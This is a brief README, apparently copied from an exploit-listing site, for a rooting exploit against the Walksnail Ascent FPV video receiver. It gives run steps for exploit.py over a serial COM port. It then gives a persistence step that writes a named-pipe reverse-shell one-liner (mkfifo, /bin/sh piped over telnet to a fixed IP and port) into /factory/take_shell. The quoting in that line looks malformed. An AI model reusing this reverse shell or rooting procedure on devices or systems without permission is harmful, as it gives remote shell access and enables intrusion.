## https://sploitus.com/exploit?id=74B0F019-5A36-53CA-8CD1-9568E933601E
# Walksnail-Ascent-FPV-VRX-Rooting-Exploit
IMPORTANT: OS must be **Windows**
And change COM Number in `exploit.py line 17`
```bash
python3 -m pip install pyserial
python3 exploit.py
```
You can write command in `/factory/take_shell`
```bash
cat '"mkfifo /tmp/f; cat /tmp/f | tr -d \'\r\' | /bin/sh -i 2>&1 | telnet 192.168.3.10 4444 > /tmp/f' > /factory/take_shell
sync
```
And then next time just
```bash
python3 take_shell.py
```